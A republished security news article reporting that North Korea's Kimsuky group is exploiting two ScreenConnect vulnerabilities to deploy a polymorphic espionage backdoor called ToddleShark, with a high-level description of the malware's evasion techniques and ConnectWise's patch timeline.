North Korea Hits ScreenConnect Bugs to Drop ToddleShark Malware

  /     /     /  
Publicated : 23/11/2024   Category : security


North Korea Hits ScreenConnect Bugs to Drop ToddleShark Malware


North Koreas latest espionage tool is tough to pin down, with random generators that throw detection mechanisms off its scent. The DPRK is using the recent critical bugs in ConnectWise ScreenConnect, a remote desktop tool, to deliver the bug.



North Korean hackers are using a critical vulnerability in ConnectWises ScreenConnect software to spread new, shapeshifting espionage malware.
Two weeks ago, ConnectWise revealed two flaws in its popular remote desktop application: CVE-2024-1708, a path traversal bug given a high score of 8.4 out of 10 on the CVSS scale, and CVE-2024-1709, a rare critical 10 out of 10 authentication bypass bug. With hardly a moment to spare, cyberattackers pounced — most notably,
initial access brokers (IABs) in cahoots with ransomware groups
— with
thousands of organizations
in the firing line scrambling to patch.
Kimsuky (aka APT43)
, the advanced persistent threat (APT) from the Democratic Peoples Republic of Korea (DPRK), is getting in on the action, too. According to a new blog post from Kroll, its
exploiting vulnerable versions of ScreenConnect to deploy a new backdoor called ToddleShark.
The list of threat actors utilizing the ScreenConnect vulnerability CVE-2024-1709 for initial access is growing, according to Kroll. Patching ScreenConnect applications is therefore imperative.
ToddleShark builds off of previous Kimsuky malware but stands out for its approach to anti-detection.
In recent espionage campaigns, Kimsuky has deployed various custom
backdoors, including ReconShark
and BabyShark, against government organizations, research centers, think tanks, and universities in North America, Europe, and Asia.
ToddleShark, the weapon of choice this time around, is notably similar to BabyShark, but it has certain important advancements.
Among other functions, ToddleShark gathers system information, including configuration details, what security software is installed on the device, and lists of user sessions, network connections, running processes, and more.
It then sends that information back to attacker-controlled command-and-control (C2) servers via cryptographically protected Privacy-Enhanced Mail (PEM) certificates.
The malware being deployed in this case uses execution through a legitimate Microsoft binary, MSHTA, and exhibits elements of polymorphic behavior in the form of changing identity strings in code, changing the position of code via generated junk code and using uniquely generated C2 URLs, which could make this malware hard to detect in some environments, Kroll researchers said in their post, released today.
ToddleShark stands out most, though, for how it uses random generation algorithms to dodge detection. For example, it uses random names for variables and functions to stump static detection, and randomizes its strings and the ordering of code to confuse standard signature-based detection.
Interspersed with its regular malicious code are large chunks of junk code, and hexadecimal encoded code, making the final outcome look like a bit of a mess.
Blocklisting doesnt really work against ToddleShark, either, because the hash of the initial payload and URLs used to download additional stages of the malware are always different.
The fact that detecting this backdoor is so tricky only emphasizes the need for organizations to update, if they havent already. A patch and other resources for ConnectWise customers are available
on the vendors website
.
A ConnectWise spokesperson laid out the timeline:
On February 13th, an independent researcher submitted a potential ScreenConnect vulnerability through our voluntary disclosure process, the person says. Once validated, ConnectWise mitigated all cloud instances of ScreenConnect within 48 hours. On February 19th, we released a patch for all on-prem ScreenConnect customers, posted a security bulletin on the ConnectWise Trust Center, and sent patching instructions to ScreenConnect customers.
ConnectWise noted that customers should immediately patch on-prem instances of ScreenConnect.
At this time, ConnectWise and other cybersecurity firms have seen exploits of the ScreenConnect vulnerability on unpatched on-prem instances, the spokesperson says. However, cyberattacks can occur through numerous avenues, including vulnerabilities, phishing, and business email compromise. While usually used for IT service delivery and product support, attackers can misuse remote control tools to facilitate malicious activities.

Last News

▸ Travel agency fined £150,000 for breaking Data Protection Act. ◂
Discovered: 23/12/2024
Category: security

▸ 7 arrested, 3 more charged in StubHub cyber fraud ring. ◂
Discovered: 23/12/2024
Category: security

▸ Nigerian scammers now turning into mediocre malware pushers. ◂
Discovered: 23/12/2024
Category: security


Cyber Security Categories
Google Dorks Database
Exploits Vulnerability
Exploit Shellcodes

CVE List
Tools/Apps
News/Aarticles

Phishing Database
Deepfake Detection
Trends/Statistics & Live Infos



Tags:
North Korea Hits ScreenConnect Bugs to Drop ToddleShark Malware